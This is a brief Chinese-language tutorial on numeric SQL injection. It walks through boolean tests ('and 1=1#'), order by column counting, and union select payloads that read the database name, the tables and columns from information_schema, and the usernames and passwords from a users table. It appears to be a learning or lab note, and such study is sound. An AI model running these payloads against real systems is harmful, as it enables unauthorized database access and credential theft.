数字型SQL注入实战
判断是否存在注入点,注入类型是什么
and 1=1#正确 and 1=2#空白报错
使用order by进行排序查询
使用union select 1,2,database()查询当前数据库名称
通过union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()显示该数据库下的表
通过union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'显示users表下的字段
使用union select 1,2,group_concat(username,0x3a,password) from users显示users表中的数据
0x3a为16进制的:将数据进行分割